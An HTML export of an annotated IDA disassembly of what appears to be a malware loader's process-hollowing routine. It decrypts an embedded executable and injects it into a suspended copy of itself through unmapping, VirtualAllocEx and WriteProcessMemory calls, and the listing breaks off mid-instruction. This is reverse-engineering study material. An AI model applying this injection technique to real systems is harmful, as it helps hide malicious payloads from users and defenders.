<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <title>[IDA View-A]</title> </head> <body bgcolor="white"> <span style="font: Lucida Console; color: blue; background: white"> <pre> ; ; +-------------------------------------------------------------------------+ ; | This file is generated by The Interactive Disassembler (IDA) | ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> | ; +-------------------------------------------------------------------------+ ; <span style="color:black">CODE:00402480 </span><span style="color:black">CODE:00402480 </span><span style="color:gray">; =============== S U B R O U T I N E ======================================= </span><span style="color:black">CODE:00402480 </span><span style="color:black">CODE:00402480 </span><span style="color:gray">; Attributes: bp-based frame </span><span style="color:black">CODE:00402480 </span><span style="color:black">CODE:00402480 </span>; int __stdcall launch_image_in_memory(CONTEXT hProcess) <span style="color:black">CODE:00402480 </span>launch_image_in_memory proc near <span style="color:green">; CODE XREF: CODE:00402D49p </span><span style="color:black">CODE:00402480 </span><span style="color:black">CODE:00402480 </span><span style="color:green">hProcess </span><span style="color:navy">= CONTEXT ptr </span><span style="color:#008040">-148h </span><span style="color:black">CODE:00402480 </span><span style="color:black">CODE:00402480 </span><span style="color:gray">; FUNCTION CHUNK AT CODE:00401A3C SIZE 00000036 BYTES </span><span style="color:black">CODE:00402480 </span><span style="color:black">CODE:00402480 </span><span style="color:green">000 </span><span style="color:navy">push ebp</span> <span style="color:black">CODE:00402481 </span><span style="color:green">004 </span><span style="color:navy">mov ebp</span><span style="color:navy">, esp</span> <span style="color:black">CODE:00402483 </span><span style="color:green">004 </span><span style="color:navy">add esp</span><span style="color:navy">, </span><span style="color:green">0FFFFFEB8h</span> <span style="color:black">CODE:00402489 </span><span style="color:green">14C </span><span style="color:navy">push ebx</span> <span style="color:black">CODE:0040248A </span><span style="color:green">150 </span><span style="color:navy">push esi</span> <span style="color:black">CODE:0040248B </span><span style="color:green">154 </span><span style="color:navy">push edi</span> <span style="color:black">CODE:0040248C </span><span style="color:green">158 </span><span style="color:navy">mov dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">70h</span><span style="color:navy">]</span><span style="color:navy">, ecx</span> <span style="color:black">CODE:0040248F </span><span style="color:green">158 </span><span style="color:navy">mov dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">74h</span><span style="color:navy">]</span><span style="color:navy">, edx</span> <span style="color:black">CODE:00402492 </span><span style="color:green">158 </span><span style="color:navy">mov dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">78h</span><span style="color:navy">]</span><span style="color:navy">, eax</span> ; ExtendedRegisters+0x78 is initialized with a pointer <span style="color:black">CODE:00402492 </span>; to the decrypted embedded executable in heap space <span style="color:black">CODE:00402495 </span><span style="color:green">158 </span><span style="color:navy">mov eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">74h</span><span style="color:navy">]</span> <span style="color:black">CODE:00402498 </span><span style="color:green">158 </span><span style="color:navy">call sub_401EF8</span> <span style="color:black">CODE:00402498 </span><span style="color:black">CODE:0040249D </span><span style="color:green">158 </span><span style="color:navy">mov eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">70h</span><span style="color:navy">]</span> <span style="color:black">CODE:004024A0 </span><span style="color:green">158 </span><span style="color:navy">call sub_401EF8</span> <span style="color:black">CODE:004024A0 </span><span style="color:black">CODE:004024A5 </span><span style="color:green">158 </span><span style="color:navy">xor eax</span><span style="color:navy">, eax</span> <span style="color:black">CODE:004024A7 </span><span style="color:green">158 </span><span style="color:navy">push ebp</span> <span style="color:black">CODE:004024A8 </span><span style="color:green">15C </span><span style="color:navy">push offset loc_4026F0</span> <span style="color:black">CODE:004024AD </span><span style="color:green">160 </span><span style="color:navy">push dword ptr fs:[eax]</span> <span style="color:black">CODE:004024B0 </span><span style="color:green">164 </span><span style="color:navy">mov fs:[eax]</span><span style="color:navy">, esp</span> <span style="color:black">CODE:004024B3 </span><span style="color:green">164 </span><span style="color:navy">xor ebx</span><span style="color:navy">, ebx</span> <span style="color:black">CODE:004024B5 </span><span style="color:black">CODE:004024B5 </span>; init ExtendedRegisters <span style="color:black">CODE:004024B5 </span><span style="color:black">CODE:004024B5 </span><span style="color:green">164 </span><span style="color:navy">lea eax</span><span style="color:navy">, [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">44h</span><span style="color:navy">]</span> <span style="color:black">CODE:004024B8 </span><span style="color:green">164 </span><span style="color:navy">xor ecx</span><span style="color:navy">, ecx</span> <span style="color:black">CODE:004024BA </span><span style="color:green">164 </span><span style="color:navy">mov edx</span><span style="color:navy">, </span><span style="color:green">10h</span> <span style="color:black">CODE:004024BF </span><span style="color:green">164 </span><span style="color:navy">call </span>c_memset <span style="color:gray">; eax = buffer </span><span style="color:black">CODE:004024BF </span><span style="color:gray">; edx = count </span><span style="color:black">CODE:004024BF </span><span style="color:gray">; ecx = int </span><span style="color:black">CODE:004024BF </span><span style="color:black">CODE:004024C4 </span><span style="color:green">164 </span><span style="color:navy">lea eax</span><span style="color:navy">, [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">]</span> <span style="color:black">CODE:004024C7 </span><span style="color:green">164 </span><span style="color:navy">xor ecx</span><span style="color:navy">, ecx</span> <span style="color:black">CODE:004024C9 </span><span style="color:green">164 </span><span style="color:navy">mov edx</span><span style="color:navy">, </span><span style="color:green">44h</span> <span style="color:black">CODE:004024CE </span><span style="color:green">164 </span><span style="color:navy">call </span>c_memset <span style="color:gray">; eax = buffer </span><span style="color:black">CODE:004024CE </span><span style="color:gray">; edx = count </span><span style="color:black">CODE:004024CE </span><span style="color:gray">; ecx = int </span><span style="color:black">CODE:004024CE </span><span style="color:black">CODE:004024D3 </span><span style="color:black">CODE:004024D3 </span>; start copy of its own process (suspended!) <span style="color:black">CODE:004024D3 </span><span style="color:black">CODE:004024D3 </span><span style="color:green">164 </span><span style="color:navy">mov dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">]</span><span style="color:navy">, </span><span style="color:green">44h</span> <span style="color:black">CODE:004024DA </span><span style="color:green">164 </span><span style="color:navy">xor eax</span><span style="color:navy">, eax</span> <span style="color:black">CODE:004024DC </span><span style="color:green">164 </span><span style="color:navy">mov al</span><span style="color:navy">, [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">84h</span><span style="color:navy">]</span> <span style="color:black">CODE:004024DF </span><span style="color:green">164 </span><span style="color:navy">mov word ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">30h</span><span style="color:navy">]</span><span style="color:navy">, ax</span> <span style="color:black">CODE:004024E3 </span><span style="color:green">164 </span><span style="color:navy">lea eax</span><span style="color:navy">, [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">44h</span><span style="color:navy">]</span> ; +0x44 will contain the pid <span style="color:black">CODE:004024E6 </span><span style="color:green">164 </span><span style="color:navy">push eax</span> ; lpProcessInformation <span style="color:black">CODE:004024E7 </span><span style="color:green">168 </span><span style="color:navy">lea eax</span><span style="color:navy">, [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">]</span> <span style="color:black">CODE:004024EA </span><span style="color:green">168 </span><span style="color:navy">push eax</span> ; lpStartupInfo <span style="color:black">CODE:004024EB </span><span style="color:green">16C </span><span style="color:navy">push </span><span style="color:green">0</span> ; lpCurrentDirectory <span style="color:black">CODE:004024ED </span><span style="color:green">170 </span><span style="color:navy">push </span><span style="color:green">0</span> ; lpEnvironment <span style="color:black">CODE:004024EF </span><span style="color:green">174 </span><span style="color:navy">push </span><span style="color:green">CREATE_SUSPENDED</span> ; dwCreationFlags <span style="color:black">CODE:004024F1 </span><span style="color:green">178 </span><span style="color:navy">push </span><span style="color:green">0</span> ; bInheritHandles <span style="color:black">CODE:004024F3 </span><span style="color:green">17C </span><span style="color:navy">push </span><span style="color:green">0</span> ; lpThreadAttributes <span style="color:black">CODE:004024F5 </span><span style="color:green">180 </span><span style="color:navy">push </span><span style="color:green">0</span> ; lpProcessAttributes <span style="color:black">CODE:004024F7 </span><span style="color:green">184 </span><span style="color:navy">mov eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">70h</span><span style="color:navy">]</span> <span style="color:black">CODE:004024FA </span><span style="color:green">184 </span><span style="color:navy">call </span>sanitize_eax <span style="color:black">CODE:004024FA </span><span style="color:black">CODE:004024FF </span><span style="color:green">184 </span><span style="color:navy">push eax</span> ; lpCommandLine <span style="color:black">CODE:00402500 </span><span style="color:green">188 </span><span style="color:navy">mov eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">74h</span><span style="color:navy">]</span> <span style="color:black">CODE:00402503 </span><span style="color:green">188 </span><span style="color:navy">call </span>sanitize_eax <span style="color:black">CODE:00402503 </span><span style="color:black">CODE:00402508 </span><span style="color:green">188 </span><span style="color:navy">push eax</span> ; lpApplicationName <span style="color:black">CODE:00402509 </span><span style="color:green">18C </span><span style="color:navy">call </span>CreateProcessA <span style="color:black">CODE:00402509 </span><span style="color:black">CODE:0040250E </span><span style="color:green">164 </span><span style="color:navy">test eax</span><span style="color:navy">, eax</span> <span style="color:black">CODE:00402510 </span><span style="color:green">164 </span><span style="color:navy">jz </span><span style="color:gray">err_createproc</span> <span style="color:black">CODE:00402510 </span><span style="color:black">CODE:00402516 </span><span style="color:green">164 </span><span style="color:navy">mov [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">5Bh</span><span style="color:navy">]</span><span style="color:navy">, </span><span style="color:green">1</span> ; process_started = true; <span style="color:black">CODE:0040251A </span><span style="color:green">164 </span><span style="color:navy">xor eax</span><span style="color:navy">, eax</span> <span style="color:black">CODE:0040251C </span><span style="color:green">164 </span><span style="color:navy">push ebp</span> <span style="color:black">CODE:0040251D </span><span style="color:green">168 </span><span style="color:navy">push offset loc_4026CE</span> <span style="color:black">CODE:00402522 </span><span style="color:green">16C </span><span style="color:navy">push dword ptr fs:[eax]</span> <span style="color:black">CODE:00402525 </span><span style="color:green">170 </span><span style="color:navy">mov fs:[eax]</span><span style="color:navy">, esp</span> <span style="color:black">CODE:00402528 </span><span style="color:black">CODE:00402528 </span>; fill context structure of the newly created process <span style="color:black">CODE:00402528 </span>; the CONTEXT_INGEGER flag is passed to GetThreadContext() <span style="color:black">CODE:00402528 </span>; <span style="color:black">CODE:00402528 </span>; #define CONTEXT_i386 0x00010000 // this assumes that i386 and <span style="color:black">CODE:00402528 </span>; #define CONTEXT_INTEGER (CONTEXT_i386 | 0x00000002L) <span style="color:black">CODE:00402528 </span><span style="color:black">CODE:00402528 </span><span style="color:green">170 </span><span style="color:navy">mov [ebp+</span><span style="color:green">hProcess.ContextFlags</span><span style="color:navy">]</span><span style="color:navy">, </span><span style="color:#ff8000">10002h</span> <span style="color:black">CODE:00402532 </span><span style="color:green">170 </span><span style="color:navy">lea eax</span><span style="color:navy">, [ebp+</span><span style="color:green">hProcess</span><span style="color:navy">]</span> <span style="color:black">CODE:00402538 </span><span style="color:green">170 </span><span style="color:navy">push eax</span> ; lpContext <span style="color:black">CODE:00402539 </span><span style="color:green">174 </span><span style="color:navy">mov eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">48h</span><span style="color:navy">]</span> <span style="color:black">CODE:0040253C </span><span style="color:green">174 </span><span style="color:navy">push eax</span> ; hThread <span style="color:black">CODE:0040253D </span><span style="color:green">178 </span><span style="color:navy">call </span>GetThreadContext <span style="color:black">CODE:0040253D </span><span style="color:black">CODE:00402542 </span><span style="color:green">170 </span><span style="color:navy">test eax</span><span style="color:navy">, eax</span> <span style="color:black">CODE:00402544 </span><span style="color:green">170 </span><span style="color:navy">jz </span><span style="color:gray">err_ldrfailure</span> <span style="color:black">CODE:00402544 </span><span style="color:black">CODE:0040254A </span><span style="color:black">CODE:0040254A </span>; the loader exploits the fact that ebx points <span style="color:black">CODE:0040254A </span>; to the PEB at process start. <span style="color:black">CODE:0040254A </span>; so by getting the DWORD pointed to by ebx+8, <span style="color:black">CODE:0040254A </span>; the loader retrieves the ImageBaseAddress from <span style="color:black">CODE:0040254A </span>; the PEB structure <span style="color:black">CODE:0040254A </span>; (http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/Process/PEB.html) <span style="color:black">CODE:0040254A </span><span style="color:black">CODE:0040254A </span><span style="color:green">170 </span><span style="color:navy">lea eax</span><span style="color:navy">, [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">68h</span><span style="color:navy">]</span> <span style="color:black">CODE:0040254D </span><span style="color:green">170 </span><span style="color:navy">push eax</span> ; lpNumberOfBytesRead <span style="color:black">CODE:0040254E </span><span style="color:green">174 </span><span style="color:navy">push </span><span style="color:green">4</span> ; nSize <span style="color:black">CODE:00402550 </span><span style="color:green">178 </span><span style="color:navy">lea eax</span><span style="color:navy">, [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">6Ch</span><span style="color:navy">]</span> <span style="color:black">CODE:00402553 </span><span style="color:green">178 </span><span style="color:navy">push eax</span> ; lpBuffer <span style="color:black">CODE:00402554 </span><span style="color:green">17C </span><span style="color:navy">mov eax</span><span style="color:navy">, [ebp+</span><span style="color:green">hProcess._Ebx</span><span style="color:navy">]</span> <span style="color:black">CODE:0040255A </span><span style="color:green">17C </span><span style="color:navy">add eax</span><span style="color:navy">, </span><span style="color:green">8</span> <span style="color:black">CODE:0040255D </span><span style="color:green">17C </span><span style="color:navy">push eax</span> ; lpBaseAddress <span style="color:black">CODE:0040255E </span><span style="color:green">180 </span><span style="color:navy">mov eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">44h</span><span style="color:navy">]</span> <span style="color:black">CODE:00402561 </span><span style="color:green">180 </span><span style="color:navy">push eax</span> ; hProcess <span style="color:black">CODE:00402562 </span><span style="color:green">184 </span><span style="color:navy">call </span>ReadProcessMemory <span style="color:black">CODE:00402562 </span><span style="color:black">CODE:00402567 </span><span style="color:green">170 </span><span style="color:navy">test eax</span><span style="color:navy">, eax</span> <span style="color:black">CODE:00402569 </span><span style="color:green">170 </span><span style="color:navy">jz </span><span style="color:gray">err_ldrfailure</span> <span style="color:black">CODE:00402569 </span><span style="color:black">CODE:0040256F </span><span style="color:black">CODE:0040256F </span>; the virtual address space starting at the <span style="color:black">CODE:0040256F </span>; imagebase passed to ZwUnmapViewOfSection is <span style="color:black">CODE:0040256F </span>; now being unmapped, which means code/data/etc <span style="color:black">CODE:0040256F </span>; of the loaded process are removed. <span style="color:black">CODE:0040256F </span>; (http://www.osronline.com/ddkx/kmarch/k111_9oaa.htm) <span style="color:black">CODE:0040256F </span><span style="color:black">CODE:0040256F </span><span style="color:green">170 </span><span style="color:navy">mov eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">6Ch</span><span style="color:navy">]</span> <span style="color:black">CODE:00402572 </span><span style="color:green">170 </span><span style="color:navy">push eax</span> <span style="color:black">CODE:00402573 </span><span style="color:green">174 </span><span style="color:navy">mov eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">44h</span><span style="color:navy">]</span> <span style="color:black">CODE:00402576 </span><span style="color:green">174 </span><span style="color:navy">push eax</span> <span style="color:black">CODE:00402577 </span><span style="color:green">178 </span><span style="color:navy">call </span>ZwUnmapViewOfSection <span style="color:black">CODE:00402577 </span><span style="color:black">CODE:0040257C </span><span style="color:green">170 </span><span style="color:navy">test eax</span><span style="color:navy">, eax</span> <span style="color:black">CODE:0040257E </span><span style="color:green">170 </span><span style="color:navy">jl </span><span style="color:gray">err_ldrfailure</span> <span style="color:black">CODE:0040257E </span><span style="color:black">CODE:00402584 </span><span style="color:black">CODE:00402584 </span>; check if the embedded executable was successfully decrypted <span style="color:black">CODE:00402584 </span>; (remember? +0x78 contains a pointer to the embedded PE image in memory) <span style="color:black">CODE:00402584 </span><span style="color:black">CODE:00402584 </span><span style="color:green">170 </span><span style="color:navy">cmp dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">78h</span><span style="color:navy">]</span><span style="color:navy">, </span><span style="color:green">0</span> <span style="color:black">CODE:00402588 </span><span style="color:black">CODE:00402588 </span>; the code below will get the original imagesize <span style="color:black">CODE:00402588 </span>; and imagebase values of the embedded executable <span style="color:black">CODE:00402588 </span>; and use them to allocate a new memory block in <span style="color:black">CODE:00402588 </span>; the process space of the (still suspended) process <span style="color:black">CODE:00402588 </span><span style="color:black">CODE:00402588 </span><span style="color:green">170 </span><span style="color:navy">jz </span><span style="color:gray">err_ldrfailure</span> <span style="color:black">CODE:00402588 </span><span style="color:black">CODE:0040258E </span><span style="color:green">170 </span><span style="color:navy">mov eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">78h</span><span style="color:navy">]</span> <span style="color:black">CODE:00402591 </span>; get offset to PE header <span style="color:black">CODE:00402591 </span><span style="color:green">170 </span><span style="color:navy">mov eax</span><span style="color:navy">, [eax+</span><span style="color:green">3Ch</span><span style="color:navy">]</span> <span style="color:black">CODE:00402594 </span>; add address of decrypted executable and save it <span style="color:black">CODE:00402594 </span>; into the ExtendedRegisters structure <span style="color:black">CODE:00402594 </span><span style="color:green">170 </span><span style="color:navy">add eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">78h</span><span style="color:navy">]</span> <span style="color:black">CODE:00402597 </span><span style="color:green">170 </span><span style="color:navy">mov dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">5Ch</span><span style="color:navy">]</span><span style="color:navy">, eax</span> <span style="color:black">CODE:0040259A </span><span style="color:green">170 </span><span style="color:navy">push </span><span style="color:green">4</span> ; flProtect <span style="color:black">CODE:0040259C </span><span style="color:green">174 </span><span style="color:navy">push </span><span style="color:green">3000h</span> ; flAllocationType <span style="color:black">CODE:004025A1 </span><span style="color:green">178 </span><span style="color:navy">mov eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">5Ch</span><span style="color:navy">]</span> <span style="color:black">CODE:004025A4 </span>; get image size from PE header <span style="color:black">CODE:004025A4 </span><span style="color:green">178 </span><span style="color:navy">mov eax</span><span style="color:navy">, [eax+</span><span style="color:green">50h</span><span style="color:navy">]</span> <span style="color:black">CODE:004025A7 </span><span style="color:green">178 </span><span style="color:navy">push eax</span> ; dwSize <span style="color:black">CODE:004025A8 </span><span style="color:green">17C </span><span style="color:navy">mov eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">5Ch</span><span style="color:navy">]</span> <span style="color:black">CODE:004025AB </span>; get image base from PE header <span style="color:black">CODE:004025AB </span><span style="color:green">17C </span><span style="color:navy">mov eax</span><span style="color:navy">, [eax+</span><span style="color:green">34h</span><span style="color:navy">]</span> <span style="color:black">CODE:004025AE </span><span style="color:green">17C </span><span style="color:navy">push eax</span> ; lpAddress <span style="color:black">CODE:004025AF </span><span style="color:green">180 </span><span style="color:navy">mov eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">44h</span><span style="color:navy">]</span> <span style="color:black">CODE:004025B2 </span><span style="color:green">180 </span><span style="color:navy">push eax</span> ; hProcess <span style="color:black">CODE:004025B3 </span><span style="color:green">184 </span><span style="color:navy">call </span>VirtualAllocEx <span style="color:black">CODE:004025B3 </span><span style="color:black">CODE:004025B8 </span><span style="color:green">170 </span><span style="color:navy">mov dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">6Ch</span><span style="color:navy">]</span><span style="color:navy">, eax</span> <span style="color:black">CODE:004025BB </span><span style="color:green">170 </span><span style="color:navy">cmp dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">6Ch</span><span style="color:navy">]</span><span style="color:navy">, </span><span style="color:green">0</span> <span style="color:black">CODE:004025BF </span><span style="color:green">170 </span><span style="color:navy">jz </span><span style="color:gray">err_ldrfailure</span> <span style="color:black">CODE:004025BF </span><span style="color:black">CODE:004025C5 </span><span style="color:black">CODE:004025C5 </span>; write headers of the image <span style="color:black">CODE:004025C5 </span><span style="color:black">CODE:004025C5 </span><span style="color:green">170 </span><span style="color:navy">lea eax</span><span style="color:navy">, [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">64h</span><span style="color:navy">]</span> <span style="color:black">CODE:004025C8 </span><span style="color:green">170 </span><span style="color:navy">push eax</span> ; lpNumberOfBytesWritten <span style="color:black">CODE:004025C9 </span><span style="color:green">174 </span><span style="color:navy">mov eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">5Ch</span><span style="color:navy">]</span> ; ptr to PE header of decrypted executable in memory <span style="color:black">CODE:004025CC </span>; get SizeOfHeaders <span style="color:black">CODE:004025CC </span><span style="color:green">174 </span><span style="color:navy">mov eax</span><span style="color:navy">, [eax+</span><span style="color:green">54h</span><span style="color:navy">]</span> <span style="color:black">CODE:004025CF </span><span style="color:green">174 </span><span style="color:navy">push eax</span> ; nSize <span style="color:black">CODE:004025D0 </span><span style="color:green">178 </span><span style="color:navy">mov eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">78h</span><span style="color:navy">]</span> ; ptr to decrypted image in memory <span style="color:black">CODE:004025D3 </span><span style="color:green">178 </span><span style="color:navy">push eax</span> ; lpBuffer <span style="color:black">CODE:004025D4 </span><span style="color:green">17C </span><span style="color:navy">mov eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">6Ch</span><span style="color:navy">]</span> ; virtual address to write to <span style="color:black">CODE:004025D7 </span><span style="color:green">17C </span><span style="color:navy">push eax</span> ; lpBaseAddress <span style="color:black">CODE:004025D8 </span><span style="color:green">180 </span><span style="color:navy">mov eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">44h</span><span style="color:navy">]</span> ; pid <span style="color:black">CODE:004025DB </span><span style="color:green">180 </span><span style="color:navy">push eax</span> ; hProcess <span style="color:black">CODE:004025DC </span><span style="color:green">184 </span><span style="color:navy">call </span>WriteProcessMemory <span style="color:black">CODE:004025DC </span><span style="color:black">CODE:004025E1 </span><span style="color:green">170 </span><span style="color:navy">test eax</span><span style="color:navy">, eax</span> <span style="color:black">CODE:004025E3 </span><span style="color:green">170 </span><span style="color:navy">jz </span><span style="color:gray">err_ldrfailure</span> <span style="color:black">CODE:004025E3 </span><span style="color:black">CODE:004025E9 </span><span style="color:green">170 </span><span style="color:navy">mov eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">5Ch</span><span style="color:navy">]</span> <span style="color:black">CODE:004025EC </span><span style="color:green">170 </span><span style="color:navy">call </span>get_address_of_section_table <span style="color:gray">; in: eax = ptr to PE header </span><span style="color:black">CODE:004025EC </span><span style="color:black">CODE:004025F1 </span><span style="color:green">170 </span><span style="color:navy">mov esi</span><span style="color:navy">, eax</span> <span style="color:black">CODE:004025F3 </span><span style="color:green">170 </span><span style="color:navy">mov eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">5Ch</span><span style="color:navy">]</span> <span style="color:black">CODE:004025F6 </span>; get number of sections <span style="color:black">CODE:004025F6 </span><span style="color:green">170 </span><span style="color:navy">movzx eax</span><span style="color:navy">, word ptr [eax+</span><span style="color:green">6</span><span style="color:navy">]</span> <span style="color:black">CODE:004025FA </span><span style="color:green">170 </span><span style="color:navy">dec eax</span> <span style="color:black">CODE:004025FB </span><span style="color:green">170 </span><span style="color:navy">test eax</span><span style="color:navy">, eax</span> <span style="color:black">CODE:004025FD </span><span style="color:green">170 </span><span style="color:navy">jb short </span><span style="color:gray">err_no_more_sections</span> <span style="color:black">CODE:004025FD </span><span style="color:black">CODE:004025FF </span><span style="color:green">170 </span><span style="color:navy">inc eax</span> <span style="color:black">CODE:00402600 </span><span style="color:green">170 </span><span style="color:navy">mov dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">54h</span><span style="color:navy">]</span><span style="color:navy">, eax</span> ; number of sections to patch into process <span style="color:black">CODE:00402603 </span><span style="color:green">170 </span><span style="color:navy">xor ebx</span><span style="color:navy">, ebx</span> <span style="color:black">CODE:00402603 </span><span style="color:black">CODE:00402605 </span><span style="color:black">CODE:00402605 </span>; copy each section of the embedded executable <span style="color:black">CODE:00402605 </span>; into the process space <span style="color:black">CODE:00402605 </span><span style="color:black">CODE:00402605 </span><span style="color:black">CODE:00402605 </span><span style="color:gray">insert_section_into_process_space</span><span style="color:navy">: </span><span style="color:green">; CODE XREF: launch_image_in_memory+1D6j </span><span style="color:black">CODE:00402605 </span><span style="color:green">170 </span><span style="color:navy">lea eax</span><span style="color:navy">, [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">64h</span><span style="color:navy">]</span> <span style="color:black">CODE:00402608 </span><span style="color:green">170 </span><span style="color:navy">push eax</span> ; lpNumberOfBytesWritten <span style="color:black">CODE:00402609 </span><span style="color:green">174 </span><span style="color:navy">lea edi</span><span style="color:navy">, [ebx+ebx*4]</span> ; edi = number of current section * 5 <span style="color:black">CODE:0040260C </span><span style="color:green">174 </span><span style="color:navy">mov eax</span><span style="color:navy">, [esi+edi*8+</span><span style="color:green">10h</span><span style="color:navy">]</span> ; size of raw data of n-th section <span style="color:black">CODE:00402610 </span><span style="color:green">174 </span><span style="color:navy">push eax</span> ; nSize <span style="color:black">CODE:00402611 </span><span style="color:green">178 </span><span style="color:navy">mov eax</span><span style="color:navy">, [esi+edi*8+</span><span style="color:green">14h</span><span style="color:navy">]</span> ; pointer to raw data of n-th section <span style="color:black">CODE:00402615 </span><span style="color:green">178 </span><span style="color:navy">add eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">78h</span><span style="color:navy">]</span> <span style="color:black">CODE:00402618 </span><span style="color:green">178 </span><span style="color:navy">push eax</span> ; lpBuffer <span style="color:black">CODE:00402619 </span><span style="color:green">17C </span><span style="color:navy">mov eax</span><span style="color:navy">, [esi+edi*8+</span><span style="color:green">0Ch</span><span style="color:navy">]</span> ; virtual address of n-th section <span style="color:black">CODE:0040261D </span><span style="color:green">17C </span><span style="color:navy">add eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">6Ch</span><span style="color:navy">]</span> <span style="color:black">CODE:00402620 </span><span style="color:green">17C </span><span style="color:navy">push eax</span> ; lpBaseAddress <span style="color:black">CODE:00402621 </span><span style="color:green">180 </span><span style="color:navy">mov eax</span><span style="color:navy">, dword ptr [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">44h</span><span style="color:navy">]</span> <span style="color:black">CODE:00402624 </span><span style="color:green">180 </span><span style="color:navy">push eax</span> ; hProcess <span style="color:black">CODE:00402625 </span><span style="color:green">184 </span><span style="color:navy">call </span>WriteProcessMemory <span style="color:black">CODE:00402625 </span><span style="color:black">CODE:0040262A </span><span style="color:green">170 </span><span style="color:navy">test eax</span><span style="color:navy">, eax</span> <span style="color:black">CODE:0040262C </span><span style="color:green">170 </span><span style="color:navy">jz short </span><span style="color:gray">err_writeprocmem</span> <span style="color:black">CODE:0040262C </span><span style="color:black">CODE:0040262E </span><span style="color:black">CODE:0040262E </span>; convert section characteristics to <span style="color:black">CODE:0040262E </span>; memory protection "characteristics" <span style="color:black">CODE:0040262E </span><span style="color:black">CODE:0040262E </span><span style="color:green">170 </span><span style="color:navy">lea eax</span><span style="color:navy">, [ebp+</span><span style="color:green">hProcess.ExtendedRegisters</span><span style="color:navy">+</span><span style="color:green">60h</span><span style="color:navy">]</span> <span style="color:black">CODE:00402631 </span><span style="color:green">170 </span><span style="color:navy">push eax</span> ; lpflOldProtect <span style="color:black">CODE:00402632 </span><span style="color:green">174 